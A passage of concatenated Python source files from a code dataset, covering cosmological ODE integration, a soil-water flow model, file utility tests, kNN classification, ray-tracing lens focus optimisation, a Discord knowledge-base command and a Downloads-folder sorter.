= None, dloga = 1.e-2, nstep = 100, rtol = 1.e-3, atol = 1.e-10) :\n\t\t'''\n\t\tNumerically integrates the second order ODE for the time evolution of the separate universe\n\t\tgrowth response sourced by a linear CDM+baryon mode with wave length self.cls.get_transfer(z)['k (h/Mpc)'][k_ind].\n\t\tInitial conditions are set during radition domination, so loga should not be set too late or the numerical\n\t\tsolution with have a transcient contribution. \n\t\t'''\n\t\tif logai == None :\n\t\t\tlogai = -np.log(self.z_max + 1.)\n\t\telif self.zeq > 1. / np.exp(logai) - 1. and not self.quiet :\n\t\t\t warnings.warn('SeparateUniverseGrowthResponse.getGrowthResponse initial time logai not early enough for radiation dominated era initial conditions')\n\t\tif self.z_max < 1. / np.exp(logai) - 1. :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse.getGrowthResponse initial time too early')\n\t\tdelta_l, d_delta_l_d_loga = self.getSourceMode(logai, k_ind)\n\t\tfi = 3. / 2. * self.source2(logai)\n\t\tRi = fi / (1. + fi) / 3. * delta_l\n\t\tdRi = 2. * Ri\n\t\tdef getGrowthResponseDEQs(loga, state) :\n\t\t\t'''\n\t\t\tSecond order ODE for separate universe growth response sourced by linear mode delta_l\n\t\t\t'''\n\t\t\tif loga > 0. :\n\t\t\t\tloga = 0.\n\t\t\tR, dR = state\n\t\t\tdelta_l, d_delta_l_d_loga = self.getSourceMode(loga, k_ind)\n\t\t\tdeqs = np.zeros(2)\n\t\t\tdeqs[0] = dR\n\t\t\tdeqs[1] = - self.drag(loga) * dR + self.source1(loga) * delta_l + self.source2(loga) * d_delta_l_d_loga\n\t\t\treturn deqs\n\t\t#\n\t\t# Set up integrator and integrate over log(a)\n\t\t#\n\t\tgrowth_response_ode = ode(getGrowthResponseDEQs)\n\t\tgrowth_response_ode.set_integrator('lsoda', nsteps = nstep, rtol = rtol, atol = atol)\n\t\tgrowth_response_ode.set_initial_value([Ri, dRi], logai)\n\t\tlogas = [logai]\n\t\tRs = [Ri]\n\t\tstop_time = -2. 
* dloga\n\t\twhile growth_response_ode.t < stop_time :\n\t\t\tgrowth_response_ode.integrate(growth_response_ode.t + dloga)\n\t\t\tif not growth_response_ode.successful() :\n\t\t\t\tif not self.quiet :\n\t\t\t\t\twarnings.warn(\"SeparateUniverseGrowthResponse.getGrowthResponse failed to integrate at log(a) = %.6e\" % (growth_response_ode.t))\n\t\t\t\tbreak\n\t\t\tlogas.append(growth_response_ode.t)\n\t\t\tRs.append(growth_response_ode.y[0])\n\t\tgrowth_response_ode.integrate(0.)\n\t\tif growth_response_ode.successful() :\n\t\t\tlogas.append(growth_response_ode.t)\n\t\t\tRs.append(growth_response_ode.y[0])\t \n\t\tlogas = np.array(logas)\n\t\tRs = np.array(Rs)\n\t\tdelta_ls = np.array([self.getSourceMode(loga, k_ind)[0] for loga in logas])\n\t\treturn logas, Rs / delta_ls","sub_path":"SeparateUniverseGrowthResponseTest.py","file_name":"SeparateUniverseGrowthResponseTest.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275722085","text":"from waterflow.flow1d.flowFE1d import Flow1DFE\nfrom waterflow.utility import conductivityfunctions as condf\nfrom waterflow.utility import fluxfunctions as fluxf\nfrom waterflow.utility.helper import initializer\nfrom waterflow.utility.spacing import biasedspacing\nfrom waterflow.utility.plotting import quickplot, solverplot\nsoil, *_ = condf.soilselector([13])[0]\ntheta_r, theta_s, ksat, alpha, n = (soil.t_res, soil.t_sat, soil.ksat, soil.alpha, soil.n)\nL = 100\nnx = 51\nxsp = biasedspacing(nx, power=1, rb=-L)[::-1]\ninitial_states = np.repeat(0, nx)\ntheta_h = initializer(condf.VG_pressureh, theta_r=theta_r, theta_s=theta_s, a=alpha, n=n)\nconductivity_func = initializer(condf.VG_conductivity, ksat=ksat, a=alpha, n=n)\nstorage_change = initializer(fluxf.storage_change, fun=theta_h)\nM = Flow1DFE('Unsaturated transient model')\nM.set_field1d(nodes=xsp)\nM.set_gaussian_quadrature(2)\nM.set_initial_states(initial_states)\nM.set_systemfluxfunction(fluxf.richards_equation, kfun=conductivity_func)\nM.add_dirichlet_BC(0.0, 'west')\nM.add_neumann_BC(-0.3, 'east')\nM.add_spatialflux(-0.01, 'extraction')\nM.add_pointflux(-0.03, -5.5, 'pflux')\nM.add_spatialflux(storage_change)\nM.tfun = theta_h\nM.solve(dt=0.01, end_time=15)\nM.transient_dataframeify()\nsolverplot(M)\nplt.tight_layout()\nplt.show()","sub_path":"docs/source/_build/html/index_examples-1.py","file_name":"index_examples-1.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286243698","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\n * @File : test_file_util.py\n * @Time : 2020/04/28 14:07:04\n * @Author : Hanielxx\n * @Version : 1.0\n * @Desc : 测试file_util构件\n'''\n\nimport sys\nimport os\nsys.path.append(\"f:\\\\Learning\\\\siRNA\\\\Projects\\\\Tornado_LSTM\")\nprint(sys.path)\nfrom spl_sirna import file_util\nimport numpy as np\nimport pandas as pd\nos.chdir('f:\\\\Learning\\\\siRNA\\\\Projects\\\\Tornado_LSTM\\\\spl_test')\n\n\ndef test_get_data_from_file(args):\n '''\n Desc:\n 测试read file 监督学习中通用的读csv/excel的构件\n '''\n flag = True\n testRes = \"Return: \\n\"\n try:\n fp = os.path.join('spl_test\\\\', args[0])\n xname = None if args[1] == '' else args[1].split(\",\")\n yname = None if args[2] == '' else args[2]\n upper = True if args[3] == 'True' else False\n dropna = True if args[4] == 'True' else False\n encode = args[5]\n x, y = file_util.get_data_from_file(fp,\n xname=xname,\n yname=yname,\n 
upper=upper,\n dropna=dropna,\n encode=encode)\n res_x, res_y = x[:5], y[:5]\n testRes += \"xdata: {}\\nydata: {}\".format(res_x, res_y)\n except Exception as e:\n testRes += str(e)\n flag = False\n finally:\n logstring = \"rsc: get_data_from_file {}\".format(\n 'is ok' if flag else 'has bugs')\n print(\"logstring: \", logstring)\n testres = testres + \"\\n\" + logstring\n print(\"end test\")\n return testres\n\n\ndef test_write_csv_excel(args):\n '''\n Desc:\n write to file 通用的写csv/excel/txt文件构件\n '''\n flag = True\n testRes = \"Return: \\n\"\n try:\n data = args[0].split(',')\n fp = os.path.join('spl_test\\\\', args[1])\n columns = None if args[2] == 'None' else args[3].split(\",\")\n header = True if args[3] == 'True' else False\n sheet_name = args[4]\n nan_rep = args[5]\n encode = None if args[6] == 'None' else args[6]\n file_util.write_csv_excel(data, fp, columns, header, sheet_name,\n nan_rep, encode)\n except Exception as e:\n testRes += str(e)\n flag = False\n finally:\n logString = \"RSC: write_csv_excel is {}\".format(\n 'is OK' if flag else 'has bugs')\n print(\"logString: \", logString)\n testRes = testRes + \"\\n\" + logString\n print(\"End Test\")\n return testRes\n\n\nif __name__ == \"__main__\":\n # test_get_data_from_file()\n test_write_csv_excel(\n ['a,b,c,d', 'output.csv', 'None', 'False', 'None', 'NULL', 'None'])\n","sub_path":"spl_test/test_file_util.py","file_name":"test_file_util.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106313249","text":"__author__ = 'billhuang'\n\nimport numpy as np\nimport knn\nimport classifier as cf\nimport dist_utils as du\nimport kernel_utils as ku\n\nnp.random.seed(1234)\n\n# import train and test data\ndata = np.loadtxt('data.csv', delimiter = ',')\nnp.random.shuffle(data)\n\nsize = int(data.shape[0] / 2)\ntrain = data[:size, :]\ntest = data[size:, :]\n\ntrain_label_ = train[:, 0]\ntrain_features_ = train[:, 1:]\n\ntest_label_ = test[:, 0]\ntest_features_ = test[:, 1:]\n\n# K, number of nearest neighbors\nK = 3\n\n# distfunc, distance function (hamming, manhattan, square, euclidean, ...)\n# check dist_utils.py\ndistfunc = du.square\n\n# kernel, kernel for the weight in predicting label, rather than each\n# data point have 1 vote, check kernel_utils\nkernel = ku.no_kernel\n\n# classifier, based on probability or just pick the label with the highest\n# weight, check classifier.py\nclassifier = cf.hard_classifier\n\n# tie_breaker, pick dominant label in data set, or randomly pick one\n# check classifier.py\ntie_breaker = cf.dominating_label\n\npredictions = knn.KNN(K, train_label_, train_features_, test_features_,\n distfunc, kernel, classifier, tie_breaker)\n\nmisclassification_rate = np.sum(test_label_ != predictions) / (test_label_.size)\nprint(misclassification_rate)\n","sub_path":"k_nearest_neighbor/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"461670869","text":"def fetchTweets():\n\tf = open('KashmirTwitterData.txt', 'r')\n\tl = []\n\n\tfor line in f.readlines():\n\t\ttry:\n\t\t\t_id = line.split('\\t')[3].strip()\n\t\t\ttwt = line.split('\\t')[4].strip()\n\t\t\tl.append({_id: twt})\n\n\t\texcept IndexError:\n\t\t\tcontinue\n\n\tf.close()\n\n\treturn l\n\ndef main():\n\tl = fetchTweets()\n\tfor x in l :\n\t\tprint(x)\n\t\tprint('--------------------------')\n\n\nif __name__ == 
'__main__':\n\tmain()","sub_path":"Tweet.py","file_name":"Tweet.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161357262","text":"# https://github.com/M0G1/Raytracing/blob/master/scripts/focus_setting_2_lens.py\nimport math as m\nimport time\nimport os\nimport pickle\n\nimport pylab\nimport numpy as np\nfrom scipy.optimize import minimize\nfrom typing import List, Tuple\n\nfrom surfaces.analitic.ellipse import Ellipse\nfrom ray.rays_pool import RaysPool\nfrom surfaces.limited_surface import LimitedSurface\nfrom tools.generators import Generator\nfrom ray.additional.ray_genenerator import generate_rays_from_line\n\nimport tools.help as help\nimport controllers.ray_pool_ctrl as rpmc\nimport view.matlab.matlab_surface_view2D as msv\nimport view.matlab.matlab_ray_view2D as mvray\n\nDELTA = 1e-15\nDELTA_2 = np.array((-DELTA, DELTA))\nfig_num = 0\n\n\ndef average(points: (list, tuple, iter)) -> np.ndarray:\n \"\"\"\n :param points: list of same dimensional point\n :return: average point for list of point\n \"\"\"\n p_aver = np.zeros(len(points[0]))\n for point in points:\n p_aver = np.add(p_aver, point)\n\n return np.divide(p_aver, len(points))\n\n\ndef get_sco_func(rays_pools: (tuple, list), refr_coef: float):\n \"\"\"\n Before use it methods you need calculate optical path in all RaysPool except last.\n The optical path must be calculating for ray in RaysPool and they must be same length\n :param rays_pools: list of RaysPool\n (length of iterable objects rays_pools and refr_coef must to match)\n :param refr_coef: refraction coefficient for last RaysPool in rays_pools\n :return: function of sco for searching focus and function of points cloud\n \"\"\"\n if not all(isinstance(val, RaysPool) for val in rays_pools):\n raise ValueError(\"Some element in argument ray_pool is not instance of RaysPool class\")\n # if not all(isinstance(val, (int, float)) and val > 0 for val in refr_coef):\n # raise AttributeError(\"Some element in argument refr_coef is not real positive number\")\n # if len(rays_pools) != len(refr_coef):\n # raise AttributeError(\n # \"Different length of rays_pools(%s) and refr_coef(%s)\" % (str(len(rays_pools)), str(len(refr_coef))))\n\n # optical path of ray\n # read from down to up\n ray_opt_paths = [\n [\n rays_pools[i].l(j)\n for j in range(len(rays_pools[i]))\n ]\n for i in range(len(rays_pools) - 1)\n ]\n # calc const\n ray_path_const = np.zeros(len(ray_opt_paths[0]))\n for i in range(len(ray_opt_paths)):\n ray_path_const = np.add(ray_path_const, ray_opt_paths[i])\n\n # define variables\n last_pool: RaysPool = rays_pools[len(rays_pools) - 1]\n # del some variables\n del ray_opt_paths\n\n # print(\"ray_path_const\", ray_path_const)\n # print(f\"\\nmax of ray_path_const {np.max(ray_path_const)}\\n\")\n\n # write the answer function\n\n def r(h: float):\n \"\"\"\n :param last_pool: RayPool with not parallel rays\n :param ray_path_const: sum of optical path others RaysPool\n :param h: length of ray\n :return: list of point\n \"\"\"\n # read from down to up\n # ans = []\n # for i in range(len(last_pool)):\n # step = (h - ray_path_const[i]) / refr_coef\n # val = last_pool.calc_point_of_ray(i, step)\n # ans.append(val)\n # return ans\n return [last_pool.calc_point_of_ray(i, (h - ray_path_const[i]) / refr_coef) for i in range(len(last_pool))]\n\n # return [last_pool.calc_point_of_ray(i, h) for i in range(len(last_pool))]\n\n def ans(h: float):\n \"\"\"\n This function used to 
calculate the sco of rays for length rays equal h\n : param h: length rays\n : return: sco of rays for length rays equal h\n \"\"\"\n # point for ray length - h\n p_ray = r(h)\n # average point (I don't sure that work)\n p_aver = average(p_ray)\n sco = 0\n for point in p_ray:\n p_sub = np.subtract(p_aver, point)\n sco = sco + np.matmul(p_sub, p_sub)\n return m.sqrt(sco / len(p_ray))\n\n return (ans, r)\n\n\ndef get_y_lim_ell_intersection(ab_coeff: (list, tuple), centers: (list, tuple), eps=1e-6):\n \"\"\"\n return y coordinate of ellipses intersection\n \"\"\"\n y_func = lambda x, ab, center: np.sqrt(1 - ((x - center[0]) / ab[0]) ** 2) * ab[1] + center[1]\n # x_func = lambda y, ab, center: np.sqrt(1 - ((y - center[1]) / ab[1]) ** 2) * ab[0] + center[0]\n x_border = [np.min([centers[0][0], centers[1][0]]), np.max([centers[0][0], centers[1][0]])]\n func = lambda x: np.abs(y_func(x, ab_coeff[0], centers[0]) - y_func(x, ab_coeff[1], centers[1]))\n argmin, f_min = help.min_golden_ratio(func, x_border[0], x_border[1], eps)\n\n return y_func(argmin, ab_coeff[1], centers[1])\n\n\ndef renew_lim_ellipse(lim_ell: List[LimitedSurface], ab_s, center_s, eps=1e-6):\n # coordinate Y where 2 ellipse intersect\n y_lim_1 = get_y_lim_ell_intersection(ab_s[0:2], center_s[0:2], eps=1e-6) - eps * 100\n y_lim_2 = get_y_lim_ell_intersection(ab_s[2:4], center_s[2:4], eps=1e-6) - eps * 100\n limits1 = ((center_s[0][0] - ab_s[0][0], center_s[0][0]), (-y_lim_1, y_lim_1))\n limits2 = ((center_s[1][0], center_s[1][0] + ab_s[1][0]), (-y_lim_1, y_lim_1))\n limits3 = ((center_s[2][0] - ab_s[2][0], center_s[2][0]), (-y_lim_2, y_lim_2))\n limits4 = ((center_s[3][0], center_s[3][0] + ab_s[3][0]), (-y_lim_2, y_lim_2))\n limits = [limits1, limits2, limits3, limits4]\n limits = DELTA_2 + limits # make borders more a little. VERY IMPORTANT\n\n for i in range(4):\n lim_ell[i].surface.abc = ab_s[i]\n lim_ell[i].limits = limits[i]\n return lim_ell\n\n\ndef get_functional(needed_focus_point: np.ndarray, beg_ray_pool: RaysPool, lim_ell_: List[LimitedSurface], center_s,\n accuracy=1e-5, min_max_sco_val=(0, 100), logfile=open(\"focus_set.txt\", mode=\"a\"), iterat=0):\n \"\"\"\n return the minimazation functional\n \"\"\"\n\n logfile.write(\"\\n\\r\\n\\r\" + time.asctime() + \"\\n\")\n\n def functional(variables):\n \"\"\"\n return np.linalg.norm(np.subtract(focus_point, needed_focus_point)),\n sco_f, r1, h, val, focus_point\n \"\"\"\n # 8 dim func. 
4 ellipses with 2 coefficients in each.\n # set the ellipses coefficients\n variables = np.reshape(variables, (4, 2))\n lim_ell = renew_lim_ellipse(lim_ell_, variables, center_s)\n # modeling and calculating optical path\n # pools = rpmc.tracing_rayspool_ordered_surface(pool, lim_ell)\n pools = rpmc.tracing_rayspool_ordered_surface(beg_ray_pool, lim_ell, is_set_optical_path=True)\n # find the refraction coefficient(refractive_indexes) there goes the last RaysPool\n last_RaysPool: RaysPool = pools[len(pools) - 1]\n # index 0 and length DELTA = 0.1 are random\n T_val = 0.1\n point = last_RaysPool.calc_point_of_ray(0, T_val)\n refr_coef = lim_ell[len(lim_ell) - 1].get_refractive_indexes(point)[0]\n\n # getting the sco function and point cloud for constant optical length\n sco_f, r1 = get_sco_func(pools, refr_coef)\n # minimize the sco\n # properties a and b are random!!!!!\n h, val = help.min_golden_ratio(sco_f, *min_max_sco_val, accuracy)\n points = r1(h)\n focus_point = average(points)\n variables = variables.ravel()\n diff_bet_focus = np.linalg.norm(np.subtract(focus_point, needed_focus_point))\n print(f\"variables(a1,b1,...,a4,b4): {variables}\\nfocus {focus_point} {diff_bet_focus}\", file=logfile)\n print(f\"variables(a1,b1,...,a4,b4): {variables}\\nfocus {focus_point} {diff_bet_focus}\")\n\n return diff_bet_focus, pools, sco_f, r1, h, val, focus_point\n\n return functional\n\n\ndef main():\n logfile = open(\"focus_set.txt\", mode=\"a\")\n maxiter = 260\n # set 2 iter and launch\n\n ab_1_1 = (0.8, 3)\n ab_1_2 = (1, 3)\n ab_2_1 = (0.8, 3)\n ab_2_2 = (1, 3)\n ab_s = [ab_1_1, ab_1_2, ab_2_1, ab_2_2]\n # ab_s = np.asarray([0.84669971, 2.93134167, 1.04711517, 2.67583118, 0.83392378, 2.89171014, 1.04025161, 2.98363328])\n # ab_s = np.asarray([0.87053379, 2.92960797, 1.05378818, 2.65834648, 0.83555828, 2.90351797, 1.05212543, 2.97412832])\n # ab_s = ab_s.reshape((4, 2))\n\n # distance between centers\n r0_1 = 0.5\n r0_2 = 0.5\n dis_bet_lens = 1 # distance between lens\n # illustration\n # / \\ / \\\n # \\---r0_1---/---dis_bet_lens---\\---r0_2---/\n # 1 2 3 4\n # 0 1 2 3 - indexs\n # ----------------------------------------> X axis\n center2 = (0, 0)\n center1 = (center2[0] + r0_1, 0)\n center4 = (center2[0] + ab_s[1][0] + dis_bet_lens + ab_s[3][0], 0)\n # center4 = (center1[0] + ab_s[1][0] + dis_bet_lens + ab_s[3][0], 0)# Think about it\n center3 = (center4[0] + r0_2, 0)\n center_s = (center1, center2, center3, center4)\n print(\"ell centers \",center_s)\n # n1 - outside of len, n2 - inside of len, n3 - inside of len.\n n1 = 1\n n2 = 1.33\n n3 = 1.33\n n_len = (n2, n3)\n\n ellipsis = [Ellipse(center_s[i], ab_s[i], Ellipse.types.REFRACTING, n1=n1, n2=n_len[i // 2]) for i in range(4)]\n\n y_lim_1 = 2.8 # coordinate Y where 2 ellipse intersect\n y_lim_2 = 2.8\n limits1 = ((center1[0] - ab_s[0][0], center1[0]), (-y_lim_1, y_lim_1))\n limits2 = ((center2[0], center2[0] + ab_s[1][0]), (-y_lim_1, y_lim_1))\n limits3 = ((center3[0] - ab_s[2][0], center3[0]), (-y_lim_2, y_lim_2))\n limits4 = ((center4[0], center4[0] + ab_s[3][0]), (-y_lim_2, y_lim_2))\n\n limits = [limits1, limits2, limits3, limits4]\n limits = DELTA_2 + limits # make borders more a little. 
VERY IMPORTANT\n\n lim_ell = [LimitedSurface(ellipsis[i], limits[i]) for i in range(4)]\n # ___________________________________________________________\n\n # raysPool preparation\n y_abs = 1\n gen_ray_points = [\n [-1.1, -y_abs],\n [-1.1, y_abs]\n ]\n intensity = 5.5\n\n pool = generate_rays_from_line(gen_ray_points[1], intensity)\n # ___________________________________________________________\n # set the needed focus point\n needed_focus_point = np.asarray([9, 0])\n # nelder-mead optimization\n functions = get_functional(needed_focus_point, pool, lim_ell, center_s, logfile=logfile)\n functional = lambda x: functions(x)[0]\n beg_point = np.asarray(ab_s).ravel()\n\n file_name = f\"maxiter{maxiter}.txt\"\n if os.path.exists(file_name):\n print(f\"File '{file_name} exist'. Read data\")\n with open(file_name, mode=\"rb\") as f:\n res = pickle.load(f)\n\n print(\"Data is loaded\")\n else:\n res = minimize(functional, beg_point, method='nelder-mead', options={\"maxiter\": maxiter, 'disp': True},\n tol=2e-10)\n with open(file_name, mode=\"wb\") as f:\n pickle.dump(res, f)\n print(res.x, \"\\n\")\n print(res)\n\n print(\"ell centers \",center_s)\n # ========================================\n dif_bet_focus, pools, sco_f, r1, h, sco, focus_point = functions(res.x)\n points = r1(h)\n\n # ============== PLOTTING ===================\n def draw(limits, points, focus_point):\n global fig_num\n # drawing\n pylab.figure(fig_num, figsize=(6, 5))\n fig_num = fig_num + 1\n # focus point\n xy = [[points[j][i] for j in range(len(points))] for i in range(2)]\n pylab.scatter(xy[0], xy[1], color=\"red\", marker='.', alpha=0.5)\n pylab.scatter(focus_point[0], focus_point[1], color=\"purple\", marker=\"*\")\n\n # surfaces\n for lim_surface in lim_ell:\n msv.draw_exist_surface(lim_surface, \"purple\", 1)\n for ellipse in ellipsis:\n msv.draw_exist_surface(ellipse)\n # rays pools\n for ray_pool in pools:\n mvray.draw_ray_pool(ray_pool, ray_const_length=18, alpha=0.2)\n # config the view\n pylab.grid()\n pylab.xlim(*limits[0])\n pylab.ylim(*limits[1])\n\n # first figure borders\n distanse_from_border = 0.1\n b_max = np.max([ab_s[i][1] for i in range(4)])\n a_max = np.max([ab_s[i][0] for i in range(4)])\n y_inf = np.min([center_s[i][1] for i in range(4)]) - b_max - distanse_from_border\n y_sup = np.max([center_s[i][1] for i in range(4)]) + b_max + distanse_from_border\n x_inf = np.min([center_s[i][0] for i in range(4)]) - a_max - distanse_from_border\n x_sup = np.max([center_s[i][0] for i in range(4)]) + a_max + distanse_from_border\n\n # second figure borders\n is_scale_with_sco = True\n if is_scale_with_sco:\n x_sc, y_sc = 3, 3\n lim_x_sco_min = focus_point[0] - x_sc * sco\n lim_x_sco_max = focus_point[0] + x_sc * sco\n lim_y_sco_min = focus_point[1] - y_sc * sco\n lim_y_sco_max = focus_point[1] + y_sc * sco\n else:\n x_border, y_border = 2, 1\n lim_x_sco_min = focus_point[0] - x_border\n lim_x_sco_max = focus_point[0] + x_border\n lim_y_sco_min = focus_point[1] - y_border\n lim_y_sco_max = focus_point[1] + y_border\n\n draw(((x_inf, x_sup + 6.2), (y_inf, y_sup)), points, focus_point)\n pylab.title(\"Ray density: %.1f, focus at (%.3f,%3.f)\" % (intensity, *focus_point))\n draw(((lim_x_sco_min, lim_x_sco_max), (lim_y_sco_min, lim_y_sco_max)), points, focus_point)\n pylab.title(f\"Count of ray is {len(points)}, sco is {sco}\")\n\n pylab.show()\n\n\nif __name__ == '__main__':\n ab_1_1 = (0.8, 3)\n ab_1_2 = (1, 3)\n center2 = (0, 0)\n center1 = (center2[0] + 0.5, 0)\n y = get_y_lim_ell_intersection([ab_1_1, ab_1_2], 
[center1, center2])\n print(y)\n\n main()\n","sub_path":"scripts/focus_setting_2_lens.py","file_name":"focus_setting_2_lens.py","file_ext":"py","file_size_in_byte":13552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"537784834","text":"#!/bin/env python2.7\n\nimport psycopg2\n\n\n# Queries and definitions\n\ndef get_popular_articles():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n query = '''\n SELECT title,count(title) as total\n FROM articles, authors, log\n WHERE articles.author = authors.id\n AND '/article/'||articles.slug = log.path\n GROUP BY title\n ORDER BY total desc\n LIMIT 3;\n '''\n c.execute(query)\n rows = c.fetchall()\n db.close()\n return rows\n\n\ndef get_popular_authors():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n query = '''\n SELECT name, count(*) as total\n FROM articles, authors, log\n WHERE articles.author = authors.id\n AND '/article/'||articles.slug = log.path\n GROUP BY name\n ORDER BY total desc;\n '''\n c.execute(query)\n rows = c.fetchall()\n db.close()\n return rows\n\n# THIS QUERY REQUIRES THE ERROR_LIST VIEW - Instructions on the read.me\n\n\ndef get_error_rate():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n query = '''\n SELECT day, round(100.0*error/total,2) as percent_rate\n FROM error_list WHERE round(100.0*error/total,2)>1;\n '''\n c.execute(query)\n rows = c.fetchall()\n db.close()\n return rows\n\n# Output queries result to console and parsing\n\n\ndef show_report():\n print(\"Welcome to the report tool, fetching data...\\n\")\n\n data = get_popular_articles()\n print(\"Most popular three articles of all time:\")\n for datum in data:\n print(\"'%s' - %s views \") % (datum)\n print(\"\\n\")\n\n data = get_popular_authors()\n print(\"Most popular articles authors of all time:\")\n for datum in data:\n print(\"'%s' - %s views\") % (datum)\n print(\"\\n\")\n\n data = get_error_rate()\n print(\"Days with more than 1% error rate on request:\")\n for datum in data:\n err_date = datum[0]\n print((err_date.strftime(\"%B %d, %Y\"))+\" - \" +\n str(datum[1])+\"%\"+\" error\")\n\n print(\"\\ndone <3! 
take care\")\n\nshow_report()\n","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356376607","text":"# Matriz com as duas primeiras linhas já permutadas\nmatriz = [\n\t[ 13, 0, 1, 15 ],\n\t[ 0, 5, -1, 4 ],\n\t[ 1, -1, -1, 0 ]\n]\n\n# Instanciamos as variáveis com os valores iniciais\nvec = [ 1, 1, 1 ]\nstop = False\nk = 0\n\n# Iteramos o sistema enquanto os erros forem maiores de 1E-4\nwhile not stop:\n\tnew_vec = []\n\n\t# Fazemos as iterações para cada variável\n\tfor i in range(len(matriz)):\n\t\tnew_vec.append(matriz[i][-1])\n\t\tfor j in range(len(matriz[i]) - 1):\n\t\t\tif i != j:\n\t\t\t\tnew_vec[-1] -= matriz[i][j] * vec[j]\n\t\tnew_vec[-1] = new_vec[-1] / matriz[i][i]\n\n\t# Avaliamos os erros\n\terrors = []\n\tfor i in range(len(vec)):\n\t\tstop = True\n\t\terrors.append(abs(new_vec[i] - vec[i]))\n\t\tif abs(new_vec[i] - vec[i]) > 1E-4:\n\t\t\tstop = False\n\n\t# Imprimimos as tabelas\n\tvec = new_vec\n\tprint('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}'.format(k, vec[0], vec[1], vec[2], errors[0], errors[1], errors[2]))\n\tk += 1","sub_path":"EP2/ep_02c.py","file_name":"ep_02c.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"313864646","text":"import aiohttp\nimport logging\nimport time\n\nfrom config import config\nfrom discord.ext import commands\n\n\nasync def http_request(url: str):\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as resp:\n return resp\n\n\nclass WebsiteError(Exception):\n pass\n\n\nclass KnowledgeBaseCog:\n def __init__(self, bot):\n self.bot = bot\n\n @commands.cooldown(1, 1, commands.BucketType.channel)\n @commands.command(name='kb')\n async def lookup(self, ctx, *, arg):\n '''\n Get the library to give us the input as one argument. Prevents\n having to wrap it in quotes or needing to join the words.\n https://discordpy.readthedocs.io/en/rewrite/ext/commands/commands.html?highlight=commands#keyword-only-arguments\n\n Limited to 1 knowledge base query per second per channel.\n '''\n url_root = config.get('knowledge_base', 'kb_wiki_root', fallback=None)\n if url_root is None:\n logging.warning('Knowledge base has no option kb_wiki_root set in config')\n return\n\n phrase = arg.replace(' ', '_') # Turn \"Website is down\" -> \"Website_is_down\"\n msg = await ctx.send('Searching the knowledge base...')\n try:\n logging.debug('Querying {} for \\'{}\\''.format(url_root, phrase))\n response: aiohttp.ClientResponse = await http_request('{}{}'.format(url_root, phrase))\n if response.status == 200:\n # Send the URL to the page\n await msg.edit(content=response.url)\n elif response.status == 404:\n # Try sending a search page with the query\n search_response: aiohttp.Clientresponse = await http_request('{root}index.php?search={query}&profile=default&fulltext=1'\n .format(root=url_root, query=arg.replace(' ', '+')))\n if search_response.status == 200:\n await msg.edit(content='I could not find that exact page, here are some suggestions: {}'.format(search_response.url))\n else:\n raise WebsiteError\n else:\n raise WebsiteError\n except WebsiteError:\n await msg.edit('The knowledge base is not accessible at this time. 
Try again later.')\n except discord.HTTPException:\n logging.error('Failed to edit knowledge base message with result')\n except Exception as ex:\n await msg.edit('The knowledge base is not accessible at this time. Try again later.')\n logging.error(str(ex))\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(KnowledgeBaseCog(bot))","sub_path":"modules/knowledge_base.py","file_name":"knowledge_base.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430944522","text":"import os\r\nimport time\r\nimport magic\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\n\r\nclass MainHandler(FileSystemEventHandler):\r\n def getTypeOfFiles(self):\r\n for filename in os.listdir(originFolder):\r\n currentfile = originFolder + \"/\" + filename\r\n if not os.path.isdir(currentfile):\r\n typeoffile = magic.from_file(currentfile)\r\n switcher = {\r\n \"PDF\": \"pdfs\",\r\n \"JPG\": \"imgs\",\r\n \"PNG\": \"imgs\",\r\n \"TXT\": \"txts\",\r\n \"ZIP\": \"zip\",\r\n \"DOCX\": \"docx\",\r\n \"EXE\": \"exe\",\r\n \"XSLX\": \"xlsx\",\r\n \"PPTX\": \"pptx\",\r\n \"SCI\": \"sci\",\r\n \"ISO\": \"iso\",\r\n \"C\": \"programmingFiles/C\",\r\n }\r\n key = typeoffile.split(\" \")[0].upper()\r\n if key not in switcher:\r\n os.rename(currentfile, destFolder + \"/OTHERS/\" + filename)\r\n else:\r\n folderoftype = switcher[key]\r\n os.rename(currentfile, destFolder + \"/\" + folderoftype + \"/\" + filename)\r\n else:\r\n os.rename(currentfile, destFolder + \"/FOLDERS/\" + filename)\r\n\r\n\r\noriginFolder = \"C:/Users/asico/Downloads\"\r\ndestFolder = \"C:/Users/asico/Desktop/DownloadsRedirected\"\r\n\r\n\r\ntry:\r\n while True:\r\n MainHandler.getTypeOfFiles(MainHandler())\r\n time.sleep(60)\r\nexcept KeyboardInterrupt:\r\n MainHandler.getTypeOfFiles(MainHandler())\r\n","sub_path":"windowsRedirector.py","file_name":"windowsRedirector.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216409034","text":"import pygame\nfrom pygame.locals import *\n\nimport shared\n\nimport threading\nimport queue\n\nclass 